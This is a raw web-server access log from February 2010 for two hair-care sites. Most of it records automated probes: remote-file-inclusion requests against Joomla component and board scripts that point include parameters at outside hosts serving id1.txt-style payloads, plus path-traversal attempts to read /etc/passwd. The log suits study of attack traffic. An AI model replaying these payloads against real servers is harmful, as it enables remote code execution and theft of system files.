194.1.150.2 - - [08/Feb/2010:07:54:41 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:54:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:54:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:07:55:01 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.241.52.111 - - [08/Feb/2010:07:57:20 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.241.52.111 - - [08/Feb/2010:07:57:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.241.52.111 - - [08/Feb/2010:07:57:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.241.52.111 - - [08/Feb/2010:07:57:33 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.241.52.111 - - [08/Feb/2010:07:57:33 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.241.52.111 - - [08/Feb/2010:07:57:33 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.241.52.111 - - [08/Feb/2010:07:57:34 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [08/Feb/2010:07:59:35 -0800] "GET /bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [08/Feb/2010:07:59:36 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [08/Feb/2010:07:59:36 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [08/Feb/2010:08:00:01 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [08/Feb/2010:08:00:01 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [08/Feb/2010:08:00:01 -0800] "GET /bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:08:02:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:02:11 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:02:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:02:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:02:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:02:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.106 - - [08/Feb/2010:08:02:35 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1746 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
93.174.121.139 - - [08/Feb/2010:08:03:01 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.121.139 - - [08/Feb/2010:08:03:01 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.121.139 - - [08/Feb/2010:08:03:01 -0800] "GET /logs/access_100104.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.121.139 - - [08/Feb/2010:08:03:02 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.131 - - [08/Feb/2010:08:03:19 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.131 - - [08/Feb/2010:08:03:19 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.131 - - [08/Feb/2010:08:03:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.131 - - [08/Feb/2010:08:03:27 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.131 - - [08/Feb/2010:08:03:27 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.131 - - [08/Feb/2010:08:03:27 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:08:05:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:08:05:49 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:08:05:49 -0800] "GET /logs/access_091214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.184.217.50 - - [08/Feb/2010:08:06:27 -0800] "GET /logs/access_100125.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.184.217.50 - - [08/Feb/2010:08:06:27 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.184.217.50 - - [08/Feb/2010:08:06:27 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:08:06:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:08:06:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:08:06:36 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.184.217.50 - - [08/Feb/2010:08:06:43 -0800] "GET /logs/access_091228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:08:07:38 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.23.99.145 - - [08/Feb/2010:08:12:20 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://4flutes.ru////images/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
59.23.99.145 - - [08/Feb/2010:08:12:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://4flutes.ru////images/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
59.23.99.145 - - [08/Feb/2010:08:12:23 -0800] "GET /logs/access_090803.log//include/admin.lib.inc.php?site_path=http://4flutes.ru////images/idrose.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
194.1.150.2 - - [08/Feb/2010:08:13:03 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.95.78.56 - - [08/Feb/2010:08:13:27 -0800] "GET //vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.95.78.56 - - [08/Feb/2010:08:13:27 -0800] "GET /logs///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.95.78.56 - - [08/Feb/2010:08:13:31 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.1.150.2 - - [08/Feb/2010:08:13:58 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.23.99.145 - - [08/Feb/2010:08:15:54 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://4flutes.ru////images/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
59.23.99.145 - - [08/Feb/2010:08:15:57 -0800] "GET /include/admin.lib.inc.php?site_path=http://4flutes.ru////images/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
59.23.99.145 - - [08/Feb/2010:08:15:58 -0800] "GET /logs/access_090803.log//include/admin.lib.inc.php?site_path=http://4flutes.ru////images/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
194.63.235.157 - - [08/Feb/2010:08:18:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.63.235.157 - - [08/Feb/2010:08:18:35 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.63.235.157 - - [08/Feb/2010:08:18:35 -0800] "GET /logs/access_091221.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.121.139 - - [08/Feb/2010:08:20:34 -0800] "GET /logs/access_100104.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.121.139 - - [08/Feb/2010:08:20:55 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.2.240.202 - - [08/Feb/2010:08:21:17 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "growlonghairfast.com"
195.2.240.202 - - [08/Feb/2010:08:21:17 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "growlonghairfast.com"
209.90.101.2 - - [08/Feb/2010:08:22:00 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.822" "growlonghairfast.com"
220.232.237.122 - - [08/Feb/2010:08:23:16 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:23:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:23:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:23:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:23:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.232.237.122 - - [08/Feb/2010:08:23:18 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.90.101.2 - - [08/Feb/2010:08:23:41 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.822" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:24:14 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:24:14 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:24:14 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.90.104.159 - - [08/Feb/2010:08:25:23 -0800] "GET /freehairsecretsphp/viewtopic.php?p=568&sid=a6f0f582f22fe24d6101fc64e36d2027 HTTP/1.0" 200 438 "http://growlonghairfast.com/freehairsecretsphp/viewtopic.php?p=568&sid=a6f0f582f22fe24d6101fc64e36d2027" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "growlonghairfast.com"
66.90.104.159 - - [08/Feb/2010:08:25:23 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "growlonghairfast.com"
118.129.166.178 - - [08/Feb/2010:08:27:01 -0800] "GET /memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:27:01 -0800] "GET /logs//memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:27:02 -0800] "GET /logs/access.log//memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.63.235.157 - - [08/Feb/2010:08:33:59 -0800] "GET /logs/access_091221.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.187 - - [08/Feb/2010:08:34:39 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
93.174.121.139 - - [08/Feb/2010:08:34:45 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.174.121.139 - - [08/Feb/2010:08:34:45 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.174.121.139 - - [08/Feb/2010:08:34:45 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.108.61.176 - - [08/Feb/2010:08:35:35 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.108.61.176 - - [08/Feb/2010:08:35:35 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.108.61.176 - - [08/Feb/2010:08:35:36 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
67.195.115.235 - - [08/Feb/2010:08:36:28 -0800] "GET /logs/access_100208.log HTTP/1.0" 200 3021819 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
195.2.240.202 - - [08/Feb/2010:08:37:39 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "freehairsecrets.com"
195.2.240.202 - - [08/Feb/2010:08:37:40 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "freehairsecrets.com"
211.108.61.176 - - [08/Feb/2010:08:38:59 -0800] "GET /logs/access_100118.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.108.61.176 - - [08/Feb/2010:08:38:59 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.108.61.176 - - [08/Feb/2010:08:39:00 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.90.101.2 - - [08/Feb/2010:08:45:40 -0800] "GET /logs/access.log//?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
209.90.101.2 - - [08/Feb/2010:08:45:40 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.822" "www.freehairsecrets.com"
209.90.101.2 - - [08/Feb/2010:08:45:40 -0800] "GET /logs//?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4804 "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.108.61.176 - - [08/Feb/2010:08:46:41 -0800] "GET /logs/access_091123.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.178 - - [08/Feb/2010:08:51:03 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:51:03 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:08:51:03 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:08:59:28 -0800] "GET /logs/access.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:08:59:28 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:08:59:28 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:08:59:32 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:08:59:32 -0800] "GET /logs/access.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:08:59:32 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.93 - - [08/Feb/2010:09:00:03 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.93 - - [08/Feb/2010:09:00:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.93 - - [08/Feb/2010:09:00:03 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:09:00:17 -0800] "GET /logs/access.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.17.109.216 - - [08/Feb/2010:09:00:17 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
